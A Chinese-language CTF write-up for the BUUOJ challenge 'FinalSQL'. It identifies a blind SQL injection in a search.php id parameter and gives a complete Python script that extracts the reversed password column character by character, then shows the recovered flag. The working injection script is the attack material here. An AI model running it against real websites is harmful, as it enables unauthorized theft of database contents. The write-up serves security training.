[极客大挑战 2019]FinalSQL1

打开题目

sql注入,点击1试一下

点击2试一下

点击3试一下

点击4

点击5

id=6试一下

感觉是sql盲注了

编写脚本

import requests

import string

from time import sleep

url = "http://9da9cb18-3096-413a-9476-8a177ffec31a.node4.buuoj.cn:81/search.php?id=0\^({})"

如果为真时的关键字匹配

base = 'Click others'

盲注的字符集

chars = string.printable

inject = "ord(substr(reverse((SELECT(GROUP_CONCAT(password))FROM(geek.F1naI1y))),{},1))={}"

for i in range(1, 1000):

continue_ = False

for c in chars:

u = url.format(inject.format(i,ord(c)))

res = requests.get(u)

while res.status_code == 429:

sleep(1)

res = requests.get(u)

if base in res.text:

print(c,end='',flush=True)

continue_ = True

break

if not continue_:

break(参考博客)

得到flag倒序,更正为

得到flag

flag{87c0b617-4e80-4135-b08c-ad013c856e27}

相关推荐
姚远Oracle ACE13 小时前
Oracle AWR案例分析:精准定位SQL执行计划切换的时间点
数据库·sql·oracle
轻舟行713 小时前
常见的网站文件后缀名
web安全·网络安全
xixixi7777714 小时前
水坑攻击的攻击原理和特点+案例和防御方法
网络·安全·web安全
敲代码的嘎仔14 小时前
JavaWeb零基础学习Day6——JDBC
java·开发语言·sql·学习·spring·单元测试·maven
哥哥还在IT中16 小时前
让数据库更智能-大模型如何优化我们的SQL查询
数据库·sql
携欢16 小时前
PortSwigger靶场之盲 SSRF(服务器端请求伪造)漏洞通关秘籍
前端·网络·安全·web安全
Hello.Reader19 小时前
Flink Table API & SQL 概念、常用 API 与工程落地
大数据·sql·flink
网安小白的进阶之路1 天前
A模块 系统与网络安全 第四门课 弹性交换网络-4
网络·web安全·php
落一落,掉一掉1 天前
第十五周Fscan和利用漏洞上线远程和数据库提权上线远控
安全·web安全
九河云1 天前
数字化转型中的网络安全风险与零信任架构实践
运维·科技·安全·web安全·架构